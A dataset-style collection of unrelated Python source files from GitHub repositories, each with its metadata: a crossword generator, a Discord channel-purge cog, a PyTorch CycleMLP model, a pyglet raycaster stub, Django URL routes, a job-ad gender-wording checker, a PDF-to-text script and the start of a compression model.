self.__position = position\n self.__direction = direction\n self.__hits = hits\n\n def get_word(self):\n return self.__word\n\n def set_word(self, new_word: str):\n self.__word = new_word\n\n def get_position(self):\n return self.__position\n\n def set_position(self, pos: Position):\n self.__position = pos\n\n def get_direction(self):\n return self.__direction\n\n def set_direction(self, direction: str):\n self.__direction = direction\n\n def get_hits(self):\n return self.__hits\n\n def set_hits(self, hits: []):\n self.__hits = hits\n\n\nclass CrosswordGenerator:\n __board: Board\n __word_list: []\n __tracker = {}\n\n def __init__(self, board: Board, word_list: []):\n # Option: zufällig sortieren\n self.__board = board\n self.__word_list = word_list\n self.__set_start_word_position(word_list[0])\n\n @staticmethod\n def __pretty_print(obj):\n serialized = jsonpickle.encode(obj)\n print(json.dumps(json.loads(serialized), indent=2))\n\n def __set_start_word_position(self, first_word: str):\n col = (self.__board.get_size() - len(first_word)) // 2\n row = self.__board.get_size() // 2\n # self.__tracker[first_word] = (Position(row, col), \"right\")\n self.__tracker[first_word] = CandidatePlacement(word=first_word, position=Position(row, col), direction=\"right\")\n\n for char in first_word:\n self.__board.grid[row][col] = char\n col = col + 1\n\n self.generate_crossword()\n\n def generate_crossword(self):\n for word_index in range(len(listOfWords) - 1):\n options_dict = self.__find_options(listOfWords[word_index + 1])\n # print(len(options_list))\n for (new_word, candidate_placement) in options_dict.items():\n for letter in candidate_placement.get_hits():\n self.__validate_option(new_word, candidate_placement, letter)\n\n # neues Objekt:\n # Dict{ key = new_word,\n # value = {\n # old_word,\n # old_position,\n # old_direction,\n # list[] hits\n # }\n\n def __find_options(self, new_word: str):\n result = {}\n\n for set_word in self.__tracker.keys():\n letter_list = list(set_word)\n for letter_index in range(len(letter_list)):\n for char in list(new_word):\n if char == letter_list[letter_index]:\n if new_word in result:\n result[new_word].get_hits().append(letter_list[letter_index])\n else:\n old_word = copy.deepcopy(self.__tracker.get(set_word))\n candidate_placement = CandidatePlacement(set_word, old_word.get_position(), \"\", [])\n if old_word.get_direction() == \"right\":\n old_word.get_position().set_col(old_word.get_position().get_col() + letter_index)\n else:\n old_word.get_position().set_row(old_word.get_position().get_row() + letter_index)\n candidate_placement.set_direction(old_word.get_direction())\n candidate_placement.get_hits().append(letter_list[letter_index])\n result[new_word] = candidate_placement\n\n for (k, v) in result.items():\n CrosswordGenerator.__pretty_print(k)\n CrosswordGenerator.__pretty_print(v)\n return result\n\n def __validate_option(self, new_word: str, candidate: CandidatePlacement, letter: str):\n # TODO: Doppelte Buchstaben ?!\n\n prefix: int = new_word.index(letter) # Länge des Teilworts VOR dem kollidierenden Buchstaben\n suffix: int = len(new_word) - new_word.index(letter) - 1 # Länge des Teilworts NACH dem kollidierenden Buchstaben\n print(\"prefix: \", prefix)\n print(\"suffix: \", suffix)\n\n # Fall 1: Neues Wort sprengt das Board\n if candidate.get_direction() == \"right\": # hier wird die Richtung des \"alten\" Wortes geprüft, hier ist das neue Wort down ausgerichtet\n if (candidate.get_position().get_row() + suffix) > self.__board.get_size() - 1 or (\n candidate.get_position().get_row() - prefix) < 0:\n print(\"Out of board! RIGHT Row: \", candidate.get_position().get_row() - prefix, \" Column: \", candidate.get_position().get_col() - suffix)\n return False\n new_word_placement = CandidatePlacement(\n new_word,\n Position(candidate.get_position().get_row() - prefix, candidate.get_position().get_col()),\n \"down\", [])\n\n elif candidate.get_direction() == \"down\":\n if (candidate.get_position().get_col() - suffix) > self.__board.get_size() - 1 or (\n candidate.get_position().get_col() - prefix) < 0:\n print(\"Out of board! DOWN Row: \" + str(candidate.get_position().get_row()) + \" Column: \" + str(candidate.get_position().get_col()))\n return False\n new_word_placement = CandidatePlacement(\n new_word,\n Position(candidate.get_position().get_col() - prefix, candidate.get_position().get_row()),\n \"right\", [])\n\n CrosswordGenerator.__pretty_print(new_word_placement)\n\n # self.__board.print_board()\n\n # Fall 2&3: Neues Wort überschneidet sich mit einem bestehenden Wort oder ist \"zu nah\" an einem anderen Wort\n if new_word_placement.get_direction() == \"down\":\n letter_position = new_word_placement.get_position() # 1, 2\n # überprüft den ersten und letzten Buchstaben des zu setzenden Wortes, ob \"davor\" oder \"danach\" schon ein\n # Buchstabe steht (je nach Schreibrichtung) TODO: ungetestet\n if new_word_placement.get_position().get_row() - 1 >= 0:\n if self.__board.grid[new_word_placement.get_position().get_row() - 1][new_word_placement.get_position().get_col()] != \"\":\n print(\"Abbruch wegen out of Board: vertikal am Anfang\")\n return False\n\n if new_word_placement.get_position().get_row() + len(new_word) <= self.__board.get_size():\n if self.__board.grid[new_word_placement.get_position().get_row() + len(new_word_placement.get_word()) - 1][new_word_placement.get_position().get_col()] != \"\":\n print(\"Abbruch wegen out of Board: vertikal am Ende\")\n return False\n\n # überprüft alle Buchstaben zu setzenden Wort orthogonal zur Schreibrichtung\n for i in range(len(new_word_placement.get_word())):\n # Fall an der zu untersuchenden Position befindet sich der korrekte Buchstabe\n if new_word_placement.get_word()[i] == self.__board.grid[letter_position.get_row()][letter_position.get_col()]:\n letter_position.set_row(letter_position.get_row() + 1) # nächsten Buchstaben anschauen, aber per print signalisieren, dass hier ein Schnittpunkt war\n print(\"Duckduck\")\n continue\n # Fall an der zu untersuchenden Position befindet sich ein anderer Buchstabe\n elif self.__board.grid[letter_position.get_row()][letter_position.get_col()] != \"\":\n print(\"Überschneidung mit schon gesetztem Wort vorhanden\")\n return False\n # else: Feld ist noch leer\n\n # Nachbarfelder des zu untersuchenden Buchstaben überprüfen\n if \\\n letter_position.get_col() + 1 > self.__board.get_size() \\\n or letter_position.get_col() - 1 < 0 \\\n or self.__board.grid[letter_position.get_row()][letter_position.get_col() + 1] != \"\" \\\n or self.__board.grid[letter_position.get_row()][letter_position.get_col() - 1] != \"\":\n print(\"Words too close! \")\n break\n\n # Zeile von letter_position um 1 vergrößern (da wir im \"down\"-Fall sind)\n letter_position.set_row(letter_position.get_row() + 1)\n\n # TODO: ungetestet\n elif new_word_placement.get_direction() == \"right\":\n letter_position = new_word_placement.get_position() # 1, 2\n # überprüft den ersten und letzten Buchstaben des zu setzenden Wortes, ob \"davor\" oder \"danach\" schon ein\n # Buchstabe steht (je nach Schreibrichtung) TODO: ungetestet\n if new_word_placement.get_position().get_col() - 1 > 0:\n if self.__board.grid[new_word_placement.get_position().get_row()][new_word_placement.get_position().get_col() - 1] != \"\":\n print(\"Abbruch wegen out of Board 3\")\n return False\n\n if new_word_placement.get_position().get_col() + 1 < self.__board.get_size():\n if self.__board.grid[new_word_placement.get_position().get_row()][new_word_placement.get_position().get_col() + len(new_word_placement.get_word())] != \"\":\n print(\"Abbruch wegen out of Board 4\")\n return False\n\n # überprüft alle Buchstaben zu setzenden Wort orthogonal zur Schreibrichtung\n for i in range(len(new_word_placement.get_word())):\n # CrosswordGenerator.__pretty_print(letter_position)\n if new_word_placement.get_word()[i] == self.__board.grid[letter_position.get_row()][\n letter_position.get_col()]:\n letter_position.set_row(letter_position.get_col() + 1)\n print(\"Duckduck\")\n continue\n elif self.__board.grid[letter_position.get_row()][letter_position.get_col()] != \"\":\n print(\"Überschneidung mit schon gesetztem Wort vorhanden\")\n return False\n if \\\n letter_position.get_row() + 1 > self.__board.get_size() \\\n or letter_position.get_row() - 1 < 0 \\\n or self.__board.grid[letter_position.get_row() + 1][letter_position.get_col()] != \"\" \\\n or self.__board.grid[letter_position.get_row() - 1][letter_position.get_col()] != \"\":\n print(\"Words too close! \")\n break\n\n # Zeile von letter_position um 1 vergrößern (da wir im \"down\"-Fall sind)\n letter_position.set_row(letter_position.get_col() + 1)\n\n\nif __name__ == '__main__':\n listOfWords = [\"amulett\", \"zebra\"]\n listOfWords2 = [\"amulett\", \"zebra\", \"filter\", \"hymen\", \"rudern\", \"burger\", \"karosserie\", \"dinge\", \"hilfe\",\n \"vermuten\"]\n\n ducky = Board(7)\n duckys_brother = CrosswordGenerator(ducky, listOfWords)\n # ducky.print_board()\n","repo_name":"PondOfDuck/crossword_generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17814102063","text":"import logging\nimport discord\nfrom discord.ext import commands\nimport helpers\n\n\nclass PurgeChannel(commands.Cog):\n def __init__(self, bot: commands.Bot, config: helpers.Config, log: logging.Logger):\n self.bot = bot\n self.config = config\n self.log = log\n self.log.info(\"Loaded Cog PurgeChannel\")\n\n @commands.command()\n async def purge_channel(self, ctx: commands.Context, channel_alias: str):\n for channel in self.config.purge_channel:\n if ctx.channel.id == channel[\"command_channel_id\"] and channel_alias == channel[\"purge_channel_alias\"]:\n # Get the channel to purge\n discord_channel: discord.TextChannel\n discord_channel = discord.utils.get(self.bot.get_all_channels(), id=channel[\"purge_channel_id\"])\n # Used to check that the message isn't protected\n delete_allowed = lambda message: message.id not in channel[\"purge_ignore_messages\"]\n # Purge the messages that aren't protected\n deleted_messages = await discord_channel.purge(check=delete_allowed)\n helpers.log_message_deletes(deleted_messages, f\"ChannelPurge {channel_alias}\", self.log)\n if deleted_messages:\n await ctx.send(f\"Done! Deleted {len(deleted_messages)} {'message' if len(deleted_messages) == 1 else 'messages'}\")\n","repo_name":"zusorio/Echo2","sub_path":"cogs/purge_channel.py","file_name":"purge_channel.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39114334330","text":"\"\"\" \nPyTorch implementation of CycleMLP: A MLP-like Architecture for Dense Prediction\n\nAs described in https://arxiv.org/abs/2107.10224\n\nCycleMLP is built upon the Cycle Fully-Connected Layer (Cycle FC), which is capable \nof dealing with variable input scales and can serve as a generic, plug-and-play replacement \nof vanilla FC layers.\n\"\"\"\n\n\n\n\n\nimport os\nimport torch\nimport torch.nn as nn\n\n\n\nimport math\nfrom torch import Tensor\nfrom torch.nn import init\nfrom torch.nn.modules.utils import _pair\nfrom torchvision.ops.deform_conv import deform_conv2d as deform_conv2d_tv\n\n\nclass Mlp(nn.Module):\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass CycleFC(nn.Module):\n \"\"\"\n \"\"\"\n\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n kernel_size, # re-defined kernel_size, represent the spatial area of staircase FC\n stride: int = 1,\n padding: int = 0,\n dilation: int = 1,\n groups: int = 1,\n bias: bool = True,\n ):\n super(CycleFC, self).__init__()\n\n if in_channels % groups != 0:\n raise ValueError('in_channels must be divisible by groups')\n if out_channels % groups != 0:\n raise ValueError('out_channels must be divisible by groups')\n if stride != 1:\n raise ValueError('stride must be 1')\n if padding != 0:\n raise ValueError('padding must be 0')\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.stride = _pair(stride)\n self.padding = _pair(padding)\n self.dilation = _pair(dilation)\n self.groups = groups\n\n self.weight = nn.Parameter(torch.empty(out_channels, in_channels // groups, 1, 1)) # kernel size == 1\n\n if bias:\n self.bias = nn.Parameter(torch.empty(out_channels))\n else:\n self.register_parameter('bias', None)\n self.register_buffer('offset', self.gen_offset())\n\n self.reset_parameters()\n\n def reset_parameters(self) -> None:\n init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n\n if self.bias is not None:\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n init.uniform_(self.bias, -bound, bound)\n\n def gen_offset(self):\n \"\"\"\n offset (Tensor[batch_size, 2 * offset_groups * kernel_height * kernel_width,\n out_height, out_width]): offsets to be applied for each position in the\n convolution kernel.\n \"\"\"\n offset = torch.empty(1, self.in_channels*2, 1, 1)\n start_idx = (self.kernel_size[0] * self.kernel_size[1]) // 2\n assert self.kernel_size[0] == 1 or self.kernel_size[1] == 1, self.kernel_size\n for i in range(self.in_channels):\n if self.kernel_size[0] == 1:\n offset[0, 2 * i + 0, 0, 0] = 0\n offset[0, 2 * i + 1, 0, 0] = (i + start_idx) % self.kernel_size[1] - (self.kernel_size[1] // 2)\n else:\n offset[0, 2 * i + 0, 0, 0] = (i + start_idx) % self.kernel_size[0] - (self.kernel_size[0] // 2)\n offset[0, 2 * i + 1, 0, 0] = 0\n return offset\n\n def forward(self, input: Tensor) -> Tensor:\n \"\"\"\n Args:\n input (Tensor[batch_size, in_channels, in_height, in_width]): input tensor\n \"\"\"\n B, C, H, W = input.size()\n return deform_conv2d_tv(input, self.offset.expand(B, -1, H, W), self.weight, self.bias, stride=self.stride,\n padding=self.padding, dilation=self.dilation)\n\n def extra_repr(self) -> str:\n s = self.__class__.__name__ + '('\n s += '{in_channels}'\n s += ', {out_channels}'\n s += ', kernel_size={kernel_size}'\n s += ', stride={stride}'\n s += ', padding={padding}' if self.padding != (0, 0) else ''\n s += ', dilation={dilation}' if self.dilation != (1, 1) else ''\n s += ', groups={groups}' if self.groups != 1 else ''\n s += ', bias=False' if self.bias is None else ''\n s += ')'\n return s.format(**self.__dict__)\n\n\nclass CycleMLP(nn.Module):\n def __init__(self, dim, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0.):\n super().__init__()\n self.mlp_c = nn.Linear(dim, dim, bias=qkv_bias)\n\n self.sfc_h = CycleFC(dim, dim, (1, 3), 1, 0)\n self.sfc_w = CycleFC(dim, dim, (3, 1), 1, 0)\n\n self.reweight = Mlp(dim, dim // 4, dim * 3)\n\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def forward(self, x):\n B, H, W, C = x.shape\n h = self.sfc_h(x.permute(0, 3, 1, 2)).permute(0, 2, 3, 1)\n w = self.sfc_w(x.permute(0, 3, 1, 2)).permute(0, 2, 3, 1)\n c = self.mlp_c(x)\n\n a = (h + w + c).permute(0, 3, 1, 2).flatten(2).mean(2)\n a = self.reweight(a).reshape(B, C, 3).permute(2, 0, 1).softmax(dim=0).unsqueeze(2).unsqueeze(2)\n\n x = h * a[0] + w * a[1] + c * a[2]\n\n x = self.proj(x)\n x = self.proj_drop(x)\n\n return x\n\n\nclass CycleBlock(nn.Module):\n\n def __init__(self, dim, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop=0., attn_drop=0.,\n act_layer=nn.GELU, norm_layer=nn.LayerNorm, skip_lam=1.0, mlp_fn=CycleMLP):\n super().__init__()\n self.norm1 = norm_layer(dim)\n self.attn = mlp_fn(dim, qkv_bias=qkv_bias, qk_scale=None, attn_drop=attn_drop)\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer)\n self.skip_lam = skip_lam\n\n def forward(self, x):\n x = x + self.attn(self.norm1(x)) / self.skip_lam\n x = x + self.mlp(self.norm2(x)) / self.skip_lam\n return x\n\n\nclass PatchEmbedOverlapping(nn.Module):\n \"\"\" 2D Image to Patch Embedding with overlapping\n \"\"\"\n def __init__(self, patch_size=16, stride=16, padding=0, in_chans=3, embed_dim=768, norm_layer=None, groups=1):\n super().__init__()\n self.patch_size = patch_size\n # remove image_size in model init to support dynamic image size\n\n self.proj = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride, padding=padding, groups=groups)\n self.norm = norm_layer(embed_dim) if norm_layer else nn.Identity()\n\n def forward(self, x):\n x = self.proj(x)\n return x\n\n\nclass Downsample(nn.Module):\n \"\"\" Downsample transition stage\n \"\"\"\n def __init__(self, in_embed_dim, out_embed_dim, patch_size):\n super().__init__()\n assert patch_size == 2, patch_size\n self.proj = nn.Conv2d(in_embed_dim, out_embed_dim, kernel_size=(3, 3), stride=(2, 2), padding=1)\n\n def forward(self, x):\n x = x.permute(0, 3, 1, 2)\n x = self.proj(x) # B, C, H, W\n x = x.permute(0, 2, 3, 1)\n return x\n\n\ndef basic_blocks(dim, index, layers, mlp_ratio=3., qkv_bias=False, qk_scale=None, attn_drop=0.,\n skip_lam=1.0, mlp_fn=CycleMLP, **kwargs):\n blocks = []\n\n for block_idx in range(layers[index]):\n blocks.append(CycleBlock(dim, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,\n attn_drop=attn_drop, skip_lam=skip_lam, mlp_fn=mlp_fn))\n blocks = nn.Sequential(*blocks)\n\n return blocks\n\n\nclass CycleNet(nn.Module):\n \"\"\" CycleMLP Network \"\"\"\n def __init__(self, layers, img_size=224, patch_size=4, in_chans=3, num_classes=1000,\n embed_dims=None, transitions=None, segment_dim=None, mlp_ratios=None, skip_lam=1.0,\n qkv_bias=False, qk_scale=None, drop_rate=0., attn_drop_rate=0.,\n norm_layer=nn.LayerNorm, mlp_fn=CycleMLP, fork_feat=False):\n\n super().__init__()\n if not fork_feat:\n self.num_classes = num_classes\n self.fork_feat = fork_feat\n\n self.patch_embed = PatchEmbedOverlapping(patch_size=7, stride=4, padding=2, in_chans=3, embed_dim=embed_dims[0])\n\n network = []\n for i in range(len(layers)):\n stage = basic_blocks(embed_dims[i], i, layers, mlp_ratio=mlp_ratios[i], qkv_bias=qkv_bias,\n qk_scale=qk_scale, attn_drop=attn_drop_rate, \n norm_layer=norm_layer, skip_lam=skip_lam, mlp_fn=mlp_fn)\n network.append(stage)\n if i >= len(layers) - 1:\n break\n if transitions[i] or embed_dims[i] != embed_dims[i+1]:\n patch_size = 2 if transitions[i] else 1\n network.append(Downsample(embed_dims[i], embed_dims[i+1], patch_size))\n\n self.network = nn.ModuleList(network)\n\n if self.fork_feat:\n # add a norm layer for each output\n self.out_indices = [0, 2, 4, 6]\n for i_emb, i_layer in enumerate(self.out_indices):\n if i_emb == 0 and os.environ.get('FORK_LAST3', None):\n # TODO: more elegant way\n \"\"\"For RetinaNet, `start_level=1`. The first norm layer will not used.\n cmd: `FORK_LAST3=1 python -m torch.distributed.launch ...`\n \"\"\"\n layer = nn.Identity()\n else:\n layer = norm_layer(embed_dims[i_emb])\n layer_name = f'norm{i_layer}'\n self.add_module(layer_name, layer)\n else:\n # Classifier head\n self.norm = norm_layer(embed_dims[-1])\n self.head = nn.Linear(embed_dims[-1], num_classes) if num_classes > 0 else nn.Identity()\n self.apply(self.cls_init_weights)\n\n def cls_init_weights(self, m):\n if isinstance(m, nn.Linear):\n if isinstance(m, nn.Linear) and m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.LayerNorm):\n nn.init.constant_(m.bias, 0)\n nn.init.constant_(m.weight, 1.0)\n elif isinstance(m, CycleFC):\n nn.init.constant_(m.bias, 0)\n\n def get_classifier(self):\n return self.head\n\n def reset_classifier(self, num_classes, global_pool=''):\n self.num_classes = num_classes\n self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()\n\n def forward_embeddings(self, x):\n x = self.patch_embed(x)\n # B,C,H,W-> B,H,W,C\n x = x.permute(0, 2, 3, 1)\n return x\n\n def forward_tokens(self, x):\n outs = []\n for idx, block in enumerate(self.network):\n x = block(x)\n if self.fork_feat and idx in self.out_indices:\n norm_layer = getattr(self, f'norm{idx}')\n x_out = norm_layer(x)\n outs.append(x_out.permute(0, 3, 1, 2).contiguous())\n if self.fork_feat:\n return outs\n\n B, H, W, C = x.shape\n x = x.reshape(B, -1, C)\n return x\n\n def forward(self, x):\n x = self.forward_embeddings(x)\n # B, H, W, C -> B, N, C\n x = self.forward_tokens(x)\n if self.fork_feat:\n return x\n\n x = self.norm(x)\n cls_out = self.head(x.mean(1))\n return cls_out\n\ndef CycleMLP_B1(pretrained=False, **kwargs):\n transitions = [True, True, True, True]\n layers = [2, 2, 4, 2]\n mlp_ratios = [4, 4, 4, 4]\n embed_dims = [64, 128, 320, 512]\n model = CycleNet(layers, embed_dims=embed_dims, patch_size=7, transitions=transitions,\n mlp_ratios=mlp_ratios, mlp_fn=CycleMLP, **kwargs)\n return model\n\ndef CycleMLP_B2(pretrained=False, **kwargs):\n transitions = [True, True, True, True]\n layers = [2, 3, 10, 3]\n mlp_ratios = [4, 4, 4, 4]\n embed_dims = [64, 128, 320, 512]\n model = CycleNet(layers, embed_dims=embed_dims, patch_size=7, transitions=transitions,\n mlp_ratios=mlp_ratios, mlp_fn=CycleMLP, **kwargs)\n return model\n\ndef CycleMLP_B3(pretrained=False, **kwargs):\n transitions = [True, True, True, True]\n layers = [3, 4, 18, 3]\n mlp_ratios = [8, 8, 4, 4]\n embed_dims = [64, 128, 320, 512]\n model = CycleNet(layers, embed_dims=embed_dims, patch_size=7, transitions=transitions,\n mlp_ratios=mlp_ratios, mlp_fn=CycleMLP, **kwargs)\n return model\n\ndef CycleMLP_B4(pretrained=False, **kwargs):\n transitions = [True, True, True, True]\n layers = [3, 8, 27, 3]\n mlp_ratios = [8, 8, 4, 4]\n embed_dims = [64, 128, 320, 512]\n model = CycleNet(layers, embed_dims=embed_dims, patch_size=7, transitions=transitions,\n mlp_ratios=mlp_ratios, mlp_fn=CycleMLP, **kwargs)\n return model\n\ndef CycleMLP_B5(pretrained=False, **kwargs):\n transitions = [True, True, True, True]\n layers = [3, 4, 24, 3]\n mlp_ratios = [4, 4, 4, 4]\n embed_dims = [96, 192, 384, 768]\n model = CycleNet(layers, embed_dims=embed_dims, patch_size=7, transitions=transitions,\n mlp_ratios=mlp_ratios, mlp_fn=CycleMLP, **kwargs)\n return model\n\nif __name__ == \"__main__\":\n x = torch.randn(2, 3, 224, 224)\n model = CycleMLP_B1()\n y = model(x)\n print(y.shape)\n\n","repo_name":"changzy00/pytorch-attention","sub_path":"mlps/cyclemlp.py","file_name":"cyclemlp.py","file_ext":"py","file_size_in_byte":13668,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"77"} +{"seq_id":"10869084160","text":"import math\n\nimport pyglet\nfrom pyglet.window import key\nfrom pyglet import shapes\n\nfrom objects import Vector, Line\n\n# initialize\n# CONSTANTS\n# the render screen\nSCREEN = {\n \"width\": 960,\n \"height\": 540,\n}\nFIELD = {\n \"width\": 100,\n \"height\": 100,\n}\nSTART_POSITION = Vector(FIELD[\"width\"] // 2, FIELD[\"height\"] // 2)\nSTART_VIEW_DIR = Vector(0, 1)\n\n# Game objects\n# the game field\nclass Field:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self._set_bound_lines()\n\n def _set_bound_lines(self):\n bound_N = Line((0, 0), (self.width, 0))\n bound_E = Line((self.width, 0), (self.width, self.height))\n bound_S = Line((0, self.height), (self.width, self.height))\n bound_W = Line((0, 0), (0, self.height))\n\n self.lines = [bound_N, bound_E, bound_S, bound_W]\n\n def init_render(self, game):\n self.repr = []\n for line in self.lines:\n line.init_render(game)\n self.repr.append(line.repr)\n\n\n# the player object\nclass Player:\n # should have set all consts like this, i think\n size = 3\n fov = math.pi / 2\n\n def __init__(self, pos: Vector, view: Vector):\n self.position = pos\n self.view_dir = view\n\n def init_render(self, game):\n point = shapes.Circle(\n self.position.x, self.position.y, radius=self.size, batch=game.batch\n )\n view_cone_L_line = Line(\n self.position,\n self.view_dir.rotate(self.fov / 2).intersects_at(\n self.view_dir.intersects_which(game.field.lines)\n ),\n )\n view_cone_R_line = Line(\n self.position,\n self.view_dir.rotate(-self.fov / 2).intersects_at(\n self.view_dir.intersects_which(game.field.lines)\n ),\n )\n\n view_cone_L = view_cone_L_line.init_render(game)\n view_cone_R = view_cone_R_line.init_render(game)\n\n self.repr = (point, view_cone_L, view_cone_R)\n\n\n# objects in the game\nclass Game(pyglet.window.Window):\n player = Player(START_POSITION, START_VIEW_DIR)\n field = Field(FIELD[\"width\"], FIELD[\"height\"])\n\n def __init__(self, width, height):\n super().__init__(width, height)\n self.batch = pyglet.graphics.Batch()\n\n self.player.init_render(self)\n self.field.init_render(self)\n\n def on_draw(self):\n self.clear()\n self.batch.draw()\n\n\nif __name__ == \"__main__\":\n game = Game(\n SCREEN[\"width\"], SCREEN[\"height\"]\n ) # consider would state = AppState() fit here?\n event_logger = pyglet.window.event.WindowEventLogger()\n game.push_handlers(event_logger)\n pyglet.app.run()\n","repo_name":"Goluxas/raycast-render","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19689578137","text":"from django.urls import path\n\nfrom . import views\n\n\nurlpatterns = [\n path(\"entry/\", views.EntryDash.as_view(), name=\"entry\"),\n path('login/', views.LoginForm.as_view(), name='login'),\n path('register/', views.RegisterForm.as_view(), name='register'),\n]","repo_name":"yuri-potatoq/djangopad","sub_path":"dashboard/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"19189641518","text":"import re\nimport wordlists\n\ndef assess(ad_text):\n ad_text = ''.join([i if ord(i) < 128 else ' ' for i in ad_text])\n ad_text = re.sub(\"[\\\\s]\", \" \", ad_text, 0, 0)\n ad_text = re.sub(\"[\\.\\t\\,\\:;\\(\\)\\.]\", \"\", ad_text, 0, 0).split(\" \")\n ad_text = [ad for ad in ad_text if ad != \"\"]\n \n masculine_coded_words = [adword for adword in ad_text\n for word in wordlists.masculine_coded_words\n if adword.startswith(word)]\n \n feminine_coded_words = [adword for adword in ad_text\n for word in wordlists.feminine_coded_words\n if adword.startswith(word)]\n \n if feminine_coded_words and not masculine_coded_words:\n result = \"strongly feminine-coded\"\n elif masculine_coded_words and not feminine_coded_words:\n result = \"strongly masculine-coded\"\n elif not masculine_coded_words and not feminine_coded_words:\n result = \"neutral\"\n else: \n if len(feminine_coded_words) == len(masculine_coded_words):\n result = \"neutral\"\n if ((len(feminine_coded_words) / len(masculine_coded_words)) >= 2 and \n len(feminine_coded_words) > 5):\n result = \"strongly feminine-coded\"\n if ((len(masculine_coded_words) / len(feminine_coded_words)) >= 2 and \n len(masculine_coded_words) > 5):\n result = \"strongly masculine-coded\"\n if len(feminine_coded_words) > len(masculine_coded_words):\n result = \"feminine-coded\"\n if len(masculine_coded_words) > len(feminine_coded_words):\n result = \"masculine-coded\"\n \n if \"feminine\" in result:\n explanation = (\"This job ad uses more words that are stereotypically feminine \"\n \"than words that are stereotypically masculine. Fortunately, the research \"\n \"suggests this will have only a slight effect on how appealing the job is \"\n \"to men, and will encourage women applicants.\")\n elif \"masculine\" in result:\n explanation = (\"This job ad uses more words that are stereotypically masculine \"\n \"than words that are stereotypically feminine. It risks putting women off \"\n \"applying, but will probably encourage men to apply.\")\n elif not masculine_coded_words and not feminine_coded_words:\n explanation = (\"This job ad doesn't use any words that are stereotypically \"\n \"masculine and stereotypically feminine. It probably won't be off-putting \"\n \"to men or women applicants.\")\n else:\n explanation = (\"This job ad uses an equal number of words that are \"\n \"stereotypically masculine and stereotypically feminine. It probably won't \"\n \"be off-putting to men or women applicants.\")\n\n return {\"result\": result,\n \"explanation\": explanation,\n \"masculine_coded_words\": masculine_coded_words,\n \"feminine_coded_words\": feminine_coded_words\n }\n","repo_name":"mirandaadong/DataScienceDiscoveryResearch","sub_path":"genderDecoder/genderDecoder/assess.py","file_name":"assess.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70514202488","text":"from pdfminer.layout import LAParams\r\nfrom pdfminer.converter import PDFPageAggregator\r\nfrom pdfminer.pdfinterp import PDFResourceManager\r\nfrom pdfminer.pdfinterp import PDFPageInterpreter\r\nfrom pdfminer.pdfpage import PDFPage\r\nfrom pdfminer.layout import LTTextBoxHorizontal\r\n\r\ndef parsedocument(document):\r\n # convert all horizontal text into a list of lines\r\n lines = []\r\n rsrcmgr = PDFResourceManager()\r\n #convert the pdf, neglecting whitespace, and allowing single space between words\r\n laparams = LAParams()\r\n device = PDFPageAggregator(rsrcmgr, laparams=laparams)\r\n interpreter = PDFPageInterpreter(rsrcmgr, device)\r\n for page in PDFPage.get_pages(document):\r\n interpreter.process_page(page)\r\n layout = device.get_result()\r\n for element in layout:\r\n if isinstance(element, LTTextBoxHorizontal):\r\n lines.extend(element.get_text().splitlines())\r\n return lines\r\n\r\n#make sure it works with an example pdf file\r\npdf_file_obj = open(\"sample.pdf\",\"rb\")\r\npdf_reader = parsedocument(pdf_file_obj)\r\nstring = str(pdf_reader).strip(\"[]\")\r\n\r\nprint(\"Here are the contents of your pdf file:\")\r\nprint(string)\r\n\r\n#saves the contents to a created txt file\r\n#add directory wanted to save to\r\nfile1 = open(r\"C:\\files_txt\\\\test.txt\",\"a\")\r\nfile1.writelines( \"%s\\n\" % item for item in pdf_reader )\r\nfile1.close()\r\n","repo_name":"Tsutton908/PDF-to-TXT-with-spacing","sub_path":"pdf_convert.py","file_name":"pdf_convert.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13504135644","text":"import logging\nfrom Context import Context\n\nclass Model(object):\n\n def __init__(self, number):\n self.number = number\n self.contexts = {}\n self.toAdd = []\n\n def __add(self, newContext):\n self.toAdd.append(newContext)\n\n def __refreshModel(self):\n for i in xrange(0,len(self.toAdd)):\n currContext = self.toAdd.pop(i)\n if (not currContext in self.contexts):\n self.contexts[currContext.name()] = currContext\n self.toAdd = []\n\n def compress(self, text, charIndex, previousContexts, interval):\n self.__refreshModel()\n if (charIndex >= 